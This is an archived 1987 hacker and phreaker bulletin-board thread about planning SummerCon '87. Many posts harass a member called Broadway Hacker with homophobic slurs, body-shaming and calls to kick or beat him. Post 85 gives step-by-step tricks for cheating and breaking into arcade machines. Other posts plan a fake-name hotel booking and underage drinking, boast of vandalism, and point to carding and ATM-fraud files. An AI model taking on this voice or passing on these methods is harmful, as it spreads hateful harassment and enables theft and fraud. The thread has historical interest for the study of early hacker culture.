+L666
+
+
+
+25/100: hahahahah
+Name: Phantom Phreaker 46
+Date: 1:02 am  Mon May 04, 1987
+
+ 'butt-smacked' hahahah that was funnny Luke. Oh well, fuck it we(ll see what
+happens there. I personally don't think there will be any real problems, just a
+few hostilities between people who have been 'enemies' for a while.
+
+Phantom
+
+
+
+26/100: B'way "anus smacker" Hacker
+Name: Icarus 15
+Date: 2:55 am  Mon May 04, 1987
+
+I am saying this, in regret, behind his back.  BUT I will also say it to his
+ugly face.  I was on his board and he got my number and would not stop his
+annoying calls, hours on end (maybe an hour).  He wanted to meet me and after
+bluntly refusing many times, to no avail, I said to myself, "To get this fuck
+off my back I will meet him somewhere in the city."  He never showed up. And
+stopped calling. But frankly, I believe every negative rumor about him.  I am
+convinced h e is an utter fag of the worst kind.  You would too if you heard
+the kind of shit he was saying.  He asked questions his gynecologist wouldn't
+have the an swers to. (getting a bit crude..) Who was there when he was taking
+snapshots at the TAP conferences?
+
+Ic.
+
+
+
+27/100: More on BH
+Name: Evil Jay 26
+Date: 4:14 am  Mon May 04, 1987
+
+   Thats funny you should mention that. Broadway was also pretty insistent that
+I come up to visit him after the CES and some other shit. He also talked about
+getting "kicked in the balls" and shaving pubic hair. There is definately
+something wrong with him. I remember about 3 years ago when some friends of
+mine used to talk about some "crazy bastard who also talks about getting kicked
+in the balls"...this must be Broadway. Crax, lets go...
+ALONE.
+
+-Jay
+
+
+
+28/100: HAHAHAHA
+Name: Slave Driver 58
+Date: 10:02 am  Mon May 04, 1987
+
+
+  I am on the floor laughing about that.  I was at the TAP con telepub and I
+wil NEVER EVER forget this pear-shaped man taking out a camera and start
+snapping pictures.  I have never seen dirtier looks in my life.  They
+practically threw him out the window.
+
+  It is also true that BWH likes to talk about guys balls and shit on the
+phone, but Jesus Christ guys, its simplel  If he makes a move on you, be at the
+shit out of him.  What is so hard about that??  You all seem so scared of him,
+like if someone screamed out 'Oh no, its Broadway!!' hundreds would being
+running out of the hotel...
+
+  BWH is about 5-11 250lbs maybe, -all- in the gut, ass and hips.  He really
+does look like a pear...
+
+Steve Driver
+
+
+29/100: also..
+Name: Slave Driver 58
+Date: 10:07 am  Mon May 04, 1987
+
+If you were going there from a long way away, Id be SURE to get a room. Think
+about it, 30 40, 50, 1000, whatever| teenagers, drinking profusely, with no
+supervision.  90% wont be able to handle it and will just run around the hotel
+fucking things up.  I had experience with this once and we totally fucked up
+the hotel.  We took apart most of the insides of the elevator, broke all the
+screens and threw them down 10 floors etc.  And this was just a piece of shit
+hotel.  You guys are going to be in a mostly business man type of place. .. and
+they wont wait 1 sec to complain.  All in all I would be VERY careful... I also
+wouldnt sign my name to the room. At the place I was stay it was a school trip
+to Six Flags, Great Adventure| staying the school got a bill for $4000 and that
+damage was done by about 15 people.  So whoevers name is on the room
+registration better watch his ass...  I think the person is insane ...
+especially since most places want a credit card copy to insure against the
+above...
+
+Steve Driver
+
+
+
+30/100: Ba hahahahahahahahah
+Name: Knight Lightning 2
+Date: 3:10 pm  Mon May 04, 1987
+
+Holy shit, I have just flown back and forth across my room laughing so hard
+after those posts.  I remember him asking me some similar questions in the he
+past and rambling on about his balls etc.  I ignored him and "had to go, its
+time for dinner."  "But its 3:45 PM."  "Er yeah see I'm late...<click."
+
+:Knight Lightning
+
+
+
+
+31/100: Help
+Name: Knight Lightning 2
+Date: 3:15 pm  Mon May 04, 1987
+
+Can someone please get in touch with Sherlock Holmes on P-80 or leave me his
+phone number or something.  He is supposed to have some information or article
+for PWN.  Thanks.
+
+:Knight Lightning
+
+
+
+32/100: BH
+Name: Mad Hatter 51
+Date: 3:48 pm  Mon May 04, 1987
+
+He does seem to want to talk about balls alot.  Jay, he asked me that too (Have
+you ever been kicked in the balls before?).  He also kept on telling me about
+pranks he pulled(literally) in high school like tieing people nude against
+lockers and stuff..... Sounds like real fun, eh?
+
+And I'm going to the Con with him?  Maybe ahh! we'll see... I like my anal
+quarter the way it is... We shall see...
+
+
+-Hatter
+
+
+
+33/100: Say that again...?
+Name: Knight Lightning 2
+Date: 10:34 pm  Mon May 04, 1987
+
+Why are all of these peolle supposedly going with Broadway?  I doubt he is even
+going to show up himself, so don't count on a carpool.  Originally he said he
+was going, but then left me mail on Atlantis saying that he wasn't.
+
+Even if he does go, you want to find out what it feels like to have a 2 50 lbs
+pear shaped orangatang grab your balls and squeeze?
+
+:Knight Lightning
+
+
+34/100: Ouch
+Name: The Scanner 20
+Date: 11:28 pm  Mon May 04, 1987
+
+ It hurts to even think about it so I wont. Anyways,
+
+ Is this convention just for selected poeple from certian boards or can just
+about any Hacker attend?
+
+ Also, what is the name of the hotel and the exact dates this will be going on?
+                      _-The Scanner
+
+
+
+
+35/100: bh & guns
+Name: The Mentor 74
+Date: 12:27 am  Tue May 05, 1987
+
+Nuff said.
+
+
+36/100: Friends..
+Name: Mad Hatter 51
+Date: 2:54 pm  Tue May 05, 1987
+
+I don't recall specifically who he said, probally some 'friends' of his (or
+shall I say bedmates?).  Well, I'll call him and crossexamine this topic with
+him.
+
+Gang Bang?  Please.........!
+
+-Hatter
+
+
+37/100: SummerCon dates
+Name: Knight Lightning 2
+Date: 5:06 pm  Tue May 05, 1987
+
+June 19-21 (Fri-Sun), 1987.  The Executive International Best Western Hotel
+(Airport).  For all phreakers and hackers that feel so inclined as to attend.
+Its like an open party.
+
+:Knight Lightning
+
+
+
+38/100: Advanced Carding Series
+Name: The Disk Jockey 13
+Date: 12:33 am  Wed May 06, 1987
+
+Most of my advanced carding series and some other fraud files I have written
+in ARCed and on the AE line.  Look for ADVCARD.ARC.
+
+                                                 -The Disk Jockey
+
+
+
+39/100: WELL...
+Name: Sir Francis Drake 56
+Date: 1:14 am  Wed May 06, 1987
+
+AS FOOR ID TAGS, JUST LOOK FOR THE GUY WITH THE NOSE RING...HA, JUST *TR
+Y* TO
+IMPERSONATE THAT.
+
+(OF COURSE IF I DONT GO, 'LOOKING FOR THE GUY WITH THE NOSE RING' COULD
+BECOME QUITE TEDIOUS)
+
+SFD
+
+
+
+40/100: Adv Carding files
+Name: Taran King 1
+Date: 7:50 pm  Wed May 06, 1987
+
+They are now integrated in the anarchy subdirectory (because they're hardly
+phreak/hack but not really "general").  They include ADVCARD*.TXT,
+CHECKFRD.TXT, ATMFRAUD.TXT and maybe one or two I forgot, but Jockey can fill
+you in.  Snort the wave...
+-TK
+
+
+41/100: Anyone
+Name: Knight Lightning 2
+Date: 12:28 am  Thu May 07, 1987
+
+Did anyone ever get in touch with Sherlock Holmes on P-80?
+
+:Knight Lightning
+
+
+
+42/100: well...
+Name: Sir Francis Drake 56
+Date: 6:07 pm  Thu May 07, 1987
+
+Hmm, one thing I found trashing quite awhile ago was a report by Pac-Bell on
+problems they were having with their new DMS-100's...One thing was the "coin
+problems"...Ill quote the letter as its fairly interesting:
+
+Four coin problems have been discovered with the introduction of the DMS-100
+in Pacific Bell.  These are:
+ 1. Applied +48 Volts for Coin Presence Test
+ 2. Coin Return Voltage
+ 3. Paramater - Per call ground loop detection test
+ 4. Overheating of GX18AB cards Real clever name there..(Did ya get the pun?)
+
++48 Volts associated with coin service is used for Coin Overtime, Coin Presence
+Tests and Automatic Coin Toll Service (ACTS).  +48V is used in ACTS to reset
+the totalizer so that coin counting can be acomplished.  NT has developed a
+workaround for interfacing to ACTS.  Therefore the main problem is the coin
+presence test.  In normal situations, battery is applied to Tip side with the
+ring side opened.  +48V is applied to the ring sing of the line which detects
+the presence of a coin or no coin.  If no ground condition exists, no coin is
+present.  If a coin is stuck (ground condition) a line 112 report will print in
+the CO.
+
+Without +48V this cannout be done.
+
+In a situation where a customer deposits .20 cents on a call requiring a .50
+cent deposit, the .20 cent deposit is not being returned.  The TSPS machine,
+handling all call processing, will instruct the End Office to sent out voltage
+(Normal +110 Volts for collect and -110 for return) that will return the inital
+deposit.  ACTS then resets the totalizer which enables coin counting to begin
+on the initiation of the required .50 cent deposit.  Presently, the DMS is not
+doing this.
+
+
+well whatever.
+
+sfd
+
+
+43/100: well...
+Name: Sir Francis Drake 56
+Date: 6:08 pm  Thu May 07, 1987
+
+Aurgh, so I posted that on the wrong sub.  sue me.
+
+And now I compounded my lameness by posting two messages in a row.
+
+Will It ever change?  Will I ever become truly ELITE?
+
+sfd
+
+
+
+44/100: Hello Floor
+Name: Lotus 38
+Date: 3:39 am  Fri May 08, 1987
+
+I have been away for a while and I would like to also say that after reading
+all the broadway posts I was on the floor from laughter....
+
+
+45/100: B-Way....
+Name: The Disk Jockey 13
+Date: 6:48 am  Fri May 08, 1987
+
+I just wrote a code hacker in Pascal, and it's pretty gay, I'm gonna call it
+"Broadway Hacker".
+
+                                                 -The Disk Jockey
+
+46/100: Bah Ha
+Name: Knight Lightning 2
+Date: 7:54 am  Fri May 08, 1987
+
+Who cares about Broadway?  He is most likely not going to SummerCon and we
+don't want him too anyway.  Oh yeah, if he does show I heard something to
+watch out for...  If you see a large, fat, pear shaped "person" (describing
+him as either sex would be insulting) with a bulge in its pants...KICK IT! as
+hard as you can.  Because it mmost likely is going to be a camera or tape
+recorder and if its not one of those, it means the he is feeling turned on
+about seeing you and you are seconds away from being sotomized.
+
+:Knight Lightning
+
+
+47/100: Thanks...
+Name: Mad Hatter 51
+Date: 2:25 pm  Fri May 08, 1987
+
+Thanks KL and I thought you cared.  Well, I thought that he was going. He
+better or I'll UNLEASH  THE FULL FORCE!  Hehe..  Excuse the similarities...
+Also, KL, can I have a copy of that term?  I need one and I'm a lazy ass...
+Thanks.....
+
+
+-Hatter
+
+
+
+48/100: Broadway Fudge-Packer......
+Name: The Disk Jockey 13
+Date: 7:25 pm  Fri May 08, 1987
+
+Check out his posts on Atlantis.....real gay...somethings REALLY wrong with
+that dude.
+
+                                                 -The Disk Jockey
+
+
+49/100: Term Papers
+Name: Knight Lightning 2
+Date: 12:16 am  Sat May 09, 1987
+
+Should I put em up on ye ole MSP?
+
+Anyway, the fact that something is really wrong or different or strange about
+Broadway is not a unique idea.  I've held it since I met him and especially
+since he started to talk about his balls.  Who cares, so any new developments
+with people coming to SummerCon?
+
+:Knight Lightning
+
+
+50/100: well...
+Name: Sir Francis Drake 56
+Date: 6:12 pm  Sat May 09, 1987
+
+I talked to Stan yesterday (not something a wise person admits to on this
+board but who ever said I was wise) and he is still claiming that he will
+'definetly be there'. Id be awfully carefull people...he might beat you up ya
+know.
+
+
+ahem
+
+sfd
+
+
+51/100: Yeah right
+Name: Knight Lightning 2
+Date: 9:41 am  Sun May 10, 1987
+
+As far as I am concerned, Stan has about as much chance of coming to SummerCon
+as TWCB Inc., to TelePub '86.
+
+:Knight Lightning
+
+
+52/100: East Coast
+Name: Mad Hatter 51
+Date: 2:57 pm  Sun May 10, 1987
+
+Is anyone on here going to Con '87 that is from the East Coast(Preferably
+North East)?  I would like to know, just in case BH decides not to go.
+Thanks..
+
+-Hatter
+
+I just got home from a nice party.. 20 half kegs(genesee), over $300 worth of
+pot, and a case of JD. Under the circumstances, I naturally felt it upon myself
+to fuck... So I did... Did you notice how my 'extra' text is longer
+than my 'actual' post?  Well, fuck....
+
+
+53/100: Story Idea
+Name: Knight Lightning 2
+Date: 6:46 pm  Mon May 11, 1987
+
+I was wondering, would any of you (being a sample of the whole) appreciate
+seeing a sort of documentery file on the controversy and problems surrounding
+Phantom Access?  It would have a great finish that would sufficently burn one
+of the greatest geeks in our community.
+
+:Knight Lightning
+
+
+54/100: BH(again..)
+Name: Mad Hatter 51
+Date: 6:00 pm  Tue May 12, 1987
+
+Just talked to him last night, to find out definitly if he is going, and
+(according to him at least), you will be meeting me there(in other words, he's
+going)... He was talking about my girlfriend touching my balls last night...
+Pleeaaaseee!
+
+-Hatter
+./s
+
+
+55/100: Tough Call
+Name: Knight Lightning 2
+Date: 8:18 pm  Tue May 12, 1987
+
+Well its hard to second guess Broadway's sincerity about appearing at
+SummerCon.  For the moment, I still hold that I'll believe it when I see it.
+Still, he did show up (rather rudely) at TelePub '86, but then this took place
+in New York anyway.
+
+Whats the latest word about Scon from Solid State or OQ?  Sfd?
+
+:Knight Lightning
+
+
+56/100: B.H./Scon
+Name: Evil Jay 26
+Date: 8:43 am  Wed May 13, 1987
+
+    Well my patience has worn thin with Broadway. He is practically begging me
+to call him, so I left him a nasty reply that generally told him to stop
+"bugging" me (no pun intended). About him going to Summercon, I say...tell him
+no. After all, you guys have the final say so dont you. If you have any doubts,
+just read the last posts. Hell, its obvious that he's happy as a fucking lark.
+And if you still have any qualms, think about it like this :
+
+Would you invite a fagg to YOUR party?
+
+    As I said, there are alot more non-elitist going to the party then you all
+think. I could count out at least 20 off hand that non of you have probably
+ever heard of. All I can say is, good luck. If I were you I would print up a
+big article in Phrack and say its cancelled, then only invite selected people.
+If you have doubts, just remember this..(DAMN IT, REMEMBER IT),
+
+-   "Dont say I didnt tell you so" Quote, Evil Jay
+
+-J
+
+
+57/100: Well...
+Name: Sir Francis Drake 56
+Date: 4:27 pm  Wed May 13, 1987
+
+  Looking through this travel agent trade journal, and it had a list of major
+conventions in St. Louis during the next 6 months...And guess who will be in
+St. Louis on the 19th?  30,000 Southern Baptists.  Yup its the southern
+baptist convention, the biggest convention in St. Louis all year.
+
+Its from the 12-19th.  I can allready imagine arriving at the airport to see
+thousands & thousands of these people getting ready to leave.
+
+should be keenish.
+
+and YES i would invite a gay to a party...
+
+sfd
+
+
+
+
+58/100: C'mon guys
+Name: Knight Lightning 2
+Date: 5:39 pm  Wed May 13, 1987
+
+This is an OPEN party.  And as far as a bucnh of no names going, we can use the
+cash not to mention that this could bring some new future talent into the
+phreak world.  Meeting people and spreading your influence is what life is all
+about in the phreak world (heh!).
+
+Sfd, you would invite a flamming, homosexual, ball squeezing, ass licking, 250
+lbs, faggot to your party?  Well you and B0way can share a room.
+
+Mooooohahahahahahahahahaha
+
+:Knight Lightning
+
+
+
+59/100: Southern Baptists...
+Name: The Mad Hacker 47
+Date: 7:18 pm  Wed May 13, 1987
+
+I agree with the idea that we should let all people attend no matter what
+their qualifications show. I mean, if they're assholes, Take some people aside
+and coduct what business should be more private. Also, I think it would be
+great if We could get some of the Southern Baptist Women REALLY Medicated and
+Leave them at the doorstep of the Minister.
+
+Everyone Get Out Your "Disco Sucks, Long Live Rock 'n' Roll" Tee Shirts and
+Let's Get Weird.. heh.
+
+                             The Mad Hacker
+
+
+60/100: D00DZ!
+Name: The Disk Jockey 13
+Date: 7:52 pm  Wed May 13, 1987
+
+I say who the hell cares if a bunch of guys come that are unknowns, I can see
+your point Jay, but look at what this is, it's not going to be something that
+we will be able to realistally get anything done at, so I agree that the more
+money and more people, the better.  I would say that 100 people, wasted, would
+make a better party than 15 wasted people, shit what would we do?  Discuss
+wire centers?
+
+                                            -The Disk Jockey
+
+
+
+
+61/100: Good
+Name: Knight Lightning 2
+Date: 10:48 pm  Wed May 13, 1987
+
+I'm glad we are in agreement.  You see although all of us StL people are
+helping to supply dough, we expect to break even or make a small profit for our
+time, effort, and preliminary investment, not to mention the risks.  I really
+don't car so long as I break even but whatever.  The extra cash after that will
+probably go to alcohol etc.
+
+Oh yeah... and BAIL
+
+:Knight Lightning
+
+
+
+62/100: Hehe
+Name: Phantom Phreaker 46
+Date: 8:59 pm  Thu May 14, 1987
+
+ Yeah, 100 people, right, that would never be noticed, loud, or out of the
+ordinary. Still, it would be nice.
+
+ Discussing Wire Centers with 15 people with everyone intoxicated would be fun,
+I think.
+
+Phantom
+
+
+63/100: Discussions
+Name: Knight Lightning 2
+Date: 9:27 pm  Thu May 14, 1987
+
+Phantom - But aren't you the one who had a discussion about new forms of BOXES
+at Six Flags Over Mid-America with about 6 people?  (Heh!)
+
+Hey now that I mentioned it, maybe we could all go to Six Flags at S.Con (Idea
+Idea, Idea, nah never work)
+
+:Knight Lightning
+
+
+
+64/100: NONONONON!
+Name: <<< Doom Prophet 21 >>>
+Date: 4:26 pm  Fri May 15, 1987
+
+ARGHHH!! NO NO NO NO NO NO NO NO!!!
+
+Here is what we shall discuss:
+
+First, we shall discuss distortion, static, and its causes in T1 digital cable
+and in T1 ORBs. Then we shall examine the line and trunk link network, with
+maps,  lectures, and sketches on behalf of all of us. Then it will be a
+question and anwser session, with Remreeds, Reed Relays, Serving Area
+Interfaces, F1 layout, interoffice trunk maintenance, toll office reports, and
+ferrite sticks abounding. Then we will discuss WC's and MDF's and the duties
+of the MCC in all ESS levels.
+
+Actually, it sounds inttersting to me (just about everything above) but there's
+a time and place for technical discussion, and also a time for fun. So nyah.
+
+Doomy
+
+November 1986 'I did not autthorize a secret fund to the Contras'
+
+January 1987 'I may have autthorized the shipmentt butt don't remember cause
+       my colon or prostrate got operated on and I was stoned off the medicine'
+
+April 1987- 'The tower reports indicate that it was my advisors.'
+
+
+65/100: well...
+Name: Sir Francis Drake 56
+Date: 11:22 pm  Fri May 15, 1987
+
+May 1987 - 'I donated the money to the contas with the best interests of the
+            nation in mind'
+
+June 1987 - 'There was a small connection between by donations and the
+             contra's promise to keep Nancy's affair with Fawn Hall secret'.
+
+as for the Con, I think we should have a sign:
+
+"DO NOT ENTER - FOR *ELITE* ONLY"
+
+real cool...
+
+sfd
+
+
+
+66/100: Summer
+Name: Knight Lightning 2
+Date: 9:50 am  Sat May 16, 1987
+
+We are getting closer and closer to SummerCon folks.  I can't wait.
+
+Anyway, I was speaking with Taran aboutg this yesterday, but now I'd like to
+ask you (the general public).  I'm sure you all remember Phrack 13 (the joke
+isse), I felt that if people wanted to write the files, in times of need (we
+being low on files for Phrack) we would make a file or two a special feature
+like Phrack Work News or Phrack Pro-file, but with anyone contributing or
+writing it. I was think of datacapturing that stuff on sub 4 or maybe some of
+the bogus news stories on here for the first file.  What do you think? Oh yeah,
+SFD, the idea you mentioned on the genral board sounds good, do it.
+
+:Knight Lightning
+
+
+67/100: say we
+Name: Lucifer 666 43
+Date: 1:52 am  Sun May 17, 1987
+
+wanted to go to 6 flags or do some engineering? with 100 or more people it
+could be hard... maybe there should be public conferences and then small get
+togethers of the people that we know...
+
+I dont know.....100 people running around and everyone trying to meet
+everyone...
+
+sounds confusing...
+
+1988 "Well, I told mr. bush that I'd authorize it if he'd only bounce on it
+for a few more minutes"
+
+L666
+
+
+68/100: Six Flags
+Name: Knight Lightning 2
+Date: 11:57 am  Sun May 17, 1987
+
+Its a good idea in general, but we just don't have the time.  We'd need a whole
+extra day and thats more moeny for rooms and admition to the park is kinda
+expensive to.  So maybe a few might want to go, but I advise against it.
+
+:Knight Lightning
+
+
+69/100: Wait.....!
+Name: The Disk Jockey 13
+Date: 12:37 am  Mon May 18, 1987
+
+Why don't we save time by going to Six Flags AND gineering!  We could try to
+engineer the people that work at SF and find out who there boss is, what day
+they get paid, how much they make, who trained them, etc!
+
+Really though, this is al(the conference) gonna happen on friday and saturday?
+Well, why don't you throw in the optional "Sunday-Six-Flags-Day" for any of us
+that really don't feel like leaving?  What is the price for that place anymore,
+about $18?  I still think that there should be girls there, 30 or so guys,
+being wasted, and Broadway, still doesn't cut it with me, I need someone(s) be
+crude as hell to, and then abuse for a night.  Almost as good as as finding a
+new Cosmos dialup!
+
+                                       -The Disk Jockey
+
+
+70/100: Bah!
+Name: Evil Jay 26
+Date: 2:55 am  Tue May 19, 1987
+
+    Okay, since no one ever agrees with me, I thought I would explain my self
+this time around and hopefully make you understand that if alot of people show
+the show wont go. Im sure alot of you realize what kegs cost and Im sure with
+all the folks showing up (most of them probably not pitching in much - do they
+ever?), we are not going to be drinking as much as we like. 100 people in two
+rooms (not counting Broadway) - how wonderful. What do the people do who cant
+fit - (idea!) sit in the lobby and wait of course. Where do the people who can
+no longer stand go when its time for all 100 (in two rooms) people to crash? I
+couldnt tell you. What happens when the cops come? We run. What happens when
+Mrs Blow's son ends up in jail - she sues (or at least causes alot of bs), what
+happens when the cops, finding drunken people in the hallway, stumble across a
+drunken Taran King. They bust him and get him for many things including
+Intoxification (minor), Serving Minors (is that a law?), Causing a Publid
+Disturbance...among other things. What happens when Jay hits the "tank"...he
+gets 4 years in an Indiana Correctional Institure (Ive always wanted to pick
+potatoes). I was just thinking of everyone else, mostly TK.
+
+I have been to some pretty big partys, the majority of which were busted. Big
+partys are big news, and tend to draw attention from the less desirables
+(mainly cops). Contrary to what many on here have stated, the only place I
+would invite a faggot is the next Challenger to the stars. Now, Ive said my
+peice, and of course, as always, someone will disagree, someone will rag or
+someone will generally be pissed off, hate me for life, "de-"friend me or
+whatever. I know, Ive been a real negative, burnt-out, stupid-ass...BUT I DONT
+CARE!!!!1110!!
+
+-The Big J
+
+
+71/100: Reply
+Name: Taran King 1
+Date: 6:15 am  Tue May 19, 1987
+
+I think people are overestimating what will occur at SummerCon.  I hardly
+expect 100 people to show up.  Shit, even if that many do, a lot of people
+seem to be getting their own rooms...but for them to toss in like $5-$10, it
+shouldn't be a big deal.  If the kegs don't work out, we'll just get cases of
+something (not as good, but still does the trick).  As for being busted because
+too many people show up, only phreak/hacks will be allowed into the room as
+this is not an opened "party", per say.  We will not be too rowdy because we
+are in these rooms for 2 nights and we cannot afford to be kicked out,
+therefore, people WILL be quiet (Friday night anyway) and people WILL NOT be
+wandering around the hotel drunk unless they're in another room which won't
+affect ours.  The rooms will NOT be trashed because we're not positive h ow
+getting them will go (it will be under a fake name, but if they need ID, we're
+going to have to use someone's real one probably).  I don't know, we'll work it
+out, but don't expect all of those obnoxious things that usually happen at
+hotel parties to happen because if we get kicked out, people can't just drive
+or stumble back home afterwards...
+-TK
+
+
+72/100: About BIG parties.
+Name: Cheap Shades 3
+Date: 7:18 pm  Tue May 19, 1987
+
+As far as Big hotel parties go it's usually not a question of cops showing up.
+It's more a question of Hotel Management.  As far as that goes, hotel
+management is usually pretty cool about not kicking partiers out because they
+still make money off those people (as long as shit ain't getting torn up) and
+it's bad publicity to kick a bunch of drunk people out of a hotel because they
+end up driving drunk.  Also public intoxacation of a minor is a crime but being
+in a hotel gets you out of being publically intoxicated.  About the kegs,
+because there's a $25 deposit on kegs and $50 deposit on tappers I seriously
+doubt that we'd be getting kegs unless we can come up with a large quantity of
+money ahead of time. (Very unlikely).
+
+     Later,
+        ________________
+        \Cheap/ \Shades/
+         \___/   \____/
+
+(By the way I've never seen ANYONE carded for buying a keg? I wonder if that'd
+be easier than finding someone over 21?   nah)
+
+
+73/100: Tapper
+Name: Mad Hatter 51
+Date: 7:41 pm  Tue May 19, 1987
+
+$50 deposit on taps?  We buy 'em up here for around $30.  Is beer to be the
+only alcoholic beverage?  I not much of a beer drinker.  I prefer (naturally)
+vodka.  There was something else but I seemed to have forgot..
+
+Absolut rulezz d00d!!1!
+
+-Hatter
+
+
+74/100: Alky
+Name: Phantom Phreaker 46
+Date: 9:18 pm  Tue May 19, 1987
+
+  If you ask me (you don't), mentioning the word 'party' or 'beer' or anything
+like that in the same sentence/post as 'SummerCon' is only yelling to the
+world that something is going to be goinng on. Now, it would be better if ther
+would have been nothing mentioned of partying, until we got there. Anyway, I
+don't think it should be such a party where everyone has to pass out, I'm not
+for that. Getting nice and fucked up to where you can walk (with difficulty)
+or getting a really dry mouth is good enough for me.
+
+Phantom
+
+
+75/100: Partys/Summercon
+Name: Evil Jay 26
+Date: 10:45 pm  Tue May 19, 1987
+
+    Yeah, but if we told everyone it was just going to be a gathering of people
+(damn wordwrap) talking about DMS then no one (or hardly anyone) would show. I
+think the chick idea is a good one, so it might be nice if some of you locals
+invited a few long-legged females to the rooms. As for me, I'll b e looking out
+for large naked fat men and hopefully trying to have a good time without
+discussing things like DMS...etc. Look for Part III of Tales of Misadventure -
+Summercon, sometime tommorrow on Phantasie Realm or here on drive H. This one
+will feature a visit in a shower, a large naked fat man, a casualty list and
+MUCH MUCH MORE!!!11
+
+-J
+
+
+76/100: How About
+Name: Cap'N Crax 10
+Date: 11:51 pm  Tue May 19, 1987
+
+What would be the opinion of a "scams" file for phrack... I've come up
+with/invented/collected quite a few over the years.  Most are not hack/phreak
+related, nor are they related to carding.  They are mostly ways to "beat the
+system" or sort of "hack" non-technical things. Anyone interested?
+
+C^2
+
+
+
+77/100: Ditto...
+Name: The Disk Jockey 13
+Date: 7:22 am  Wed May 20, 1987
+
+for me, there's lots out there besides carding anymore.....
+
+Oh, and Stoley vodka in the freezer (it wont freeze) is so smooth you can
+drink it straight, Hatter!
+
+I was an Asst Mgr for a bar for some time, so I can bring mix equipment for
+the hell of it if anyone wants to get exotic.
+
+Shades is correct about the managers, at an Embassey Suites party I had, we
+must have had 40 people in a 2 room suites, and we were all pretty wasted, and
+there were bottle and cans everywhere, and the manager only came up once (we
+thought we were screwed) to say to "Just keep it in the rooms guys!"  He said
+something that is probably true at most hotels, trooms are somewhat sound
+proof!
+
+                                            -The Disk Jockey
+
+
+78/100: "SCAMS"!
+Name: Ax Murderer 7
+Date: 5:36 pm  Wed May 20, 1987
+
+Hmmm....Yeah, carding is getting to be a lost age (Don't get me wrong but...)
+It's getting pretty sad. Unless the editors have some legal objections, I think
+it would be a pretty cool idea. There is little to stop anyone from finding
+limits in scams. But try to keep it creative, not your typical ordering a pizza
+(What a joke.)
+
+  Ax Murderer
+
+
+79/100: well...
+Name: Sir Francis Drake 56
+Date: 6:31 pm  Wed May 20, 1987
+
+d00d, what fun would a party be without getting drunk?
+
+durrrr...I expect some lemonade for me....t-hee.
+
+(rhyme scheme!  another poem..Lemonade And Me)
+
+I think that we should have a seperate sub for the summercon so we dont have
+this dichotomy (I felt like using that word and I really dont care if I didnt
+use it quite correctly? ok? ok?) between phrack posts and summercon posts
+
+Seriously folks, the whole drinking question is stupid.  If you want to drink,
+buy it yourself.  And dont be dumb about it....("Flipper rules, OK? ...DONT BE
+STUPID"..good band)
+
+IM going to the con nyah nyah nyah...I got the tickets in my sweaty cum covered
+hands...so tweet!
+
+sfd
+"Quack, said the duck"
+
+
+80/100: getting kicked out
+Name: Lex Luthor 36
+Date: 5:41 pm  Thu May 21, 1987
+
+A funny story about Phil-Con the last Big (not nearly as big as Summer-C on
+will be) phreak conference.
+
+Tuc and I only knew what hotel it was, no room number and the name it was
+supposed to be under was not checked in. We saw a photocopied paper saying:
+"You hold the Keys to Security" with the Pennsylvania Bell logo. Scrawled on
+the bottom was Phreak-Con IV. No room number there, but it did prove that they
+were there, somewhere...
+
+Well we came to the conclusion that the only way to find them was check every
+room assuming either a door would be open and we would recognize Videosmith
+and the others, or they would be making enough noise for us to hear. After
+about the 3rd floor of listening, I was not paying attention and had my ear
+about 6 inches from a door, listening for phreaks (a smart move, hey we had no
+other way of finding them ok? ok?) and there was a hotel security guy. Well
+while I was busy looking like a theif, Tuc saw him, with the eagle eye he has,
+as the guy was 2 or 3 yards away. Well of course he wondered what I/we were
+doing. We told him the truth (not a misatake for once) and he checked our ID.
+
+Then we asked if there were any complaints. Well he remarked about about some
+guys stealing all these hotel phones... A giveaway. We told him thanks and got
+the room . That was them allright. We spent the remainder of the night being
+chased by security and hiding phones. (Not really us (me, Tuc, and Videosmith)
+but the locals) of course it was unavoidable or just plain stupid to just sit
+and wait to be ejected from the hotel so we departed also.
+
+Anyhow, they were never thrown out just warned many times. And thats it. Just
+thought I would relay that story for those few people interested.
+
+Lex
+
+
+81/100: Syndicate Reports
+Name: The Sensei 18
+Date: 6:57 pm  Thu May 21, 1987
+
+
+    I just uploaded all the Syndicate Reports from 9 to 11.  All of these I
+was absent from MSP, and thus unable to upload them.  Since Priv.Sector is
+down, TK couldn't get them anyother way.
+    For those of you that don't know what the TSR is, check them out on the
+AE, or Files section...where ever they may be at this time.
+
+Ts
+TSR
+
+
+82/100: speaking of private sector
+Name: The Prophet 23
+Date: 2:26 pm  Fri May 22, 1987
+
+What happened to it?
+  -TP
+
+
+83/100: Scams
+Name: Phantom Phreaker 46
+Date: 8:56 pm  Fri May 22, 1987
+
+(Would you look at the time, Fridaight, girlfriend isn't home, brother has the
+car so I decided to be a computer geek instead.)
+
+ About the scams file, I would like to see some ofthe shit in the vein of
+Consumertronics, such as ATM information, vending machine ripoffs, video game
+ripoffs (what the hell?), free power, and the like. When they are intelligently
+writte and informative then they are interesting to read.
+
+Phantom
+
+
+
+84/100: wait...
+Name: Lucifer 666 43
+Date: 12:54 am  Sat May 23, 1987
+
+do you think that it would be good for every kid/nazi with a modem to have the
+info to pull a scam? the scams would get cancelled hella ok, so I'm not from
+california, i'm from IL but fuck you I still say it quick.
+
+also, you could just make it a semi-public file or whatever.
+
+not as public as phrack, but then again dont just make it for you and you pal.
+
+L666
+
+
+85/100: Video Game Tricks.
+Name: Evil Jay 26
+Date: 1:45 am  Sat May 23, 1987
+
+   Because of alarms they now have the machine, use the following catiously.
+
+1) The quarter with the hole drilled in the middle will work on most machines.
+   Its just hard to get the quarter back above the credit pin.
+
+2) There is ALWAYS an extra set of keys to the front or back of the machine,
+   hanging on the inside of the door.
+
+3) The back wood they use (for the back) is like cardboard. It makes a big
+   noise when cracked, but cracked it is - and easily.
+
+4) ROM chips can be sold.
+
+5) The penny up the coin slot still works on older games, like Pac Man. On
+   MIDWAY games justflip the penny in the quarter inch slot up in the coin
+   return. Flip it til it goes up, and hopefully you'll get a credit. On Atari
+   games and similiar (ones with vertical coin slots), hold your finger up
+   inside the coin return slot so the penny wont fall all the way down. Drop a
+   penny in and once it sits there, carefully move it into the next slot on the
+   right (right next to it). Flip it up. Nickels are easier.
+
+Have phun,
+
+-The BIG J
+
+
+86/100: well...
+Name: Sir Francis Drake 56
+Date: 1:57 am  Sat May 23, 1987
+
+Ahem.  I hate to tell you this L666 but "hella" went out in CA a few years
+ago...Speaking of which Elric Of Imput up a board and its sorta an IBM ware
+board oh well but if you want to call it its at (415) 278-7421. Also, Shooting
+Shark finaly got his modem back and who know he may even start calling outside
+the bay area again some day..
+
+sfd
+
+
+
+
+87/100: Atlantis
+Name: Taran King 1
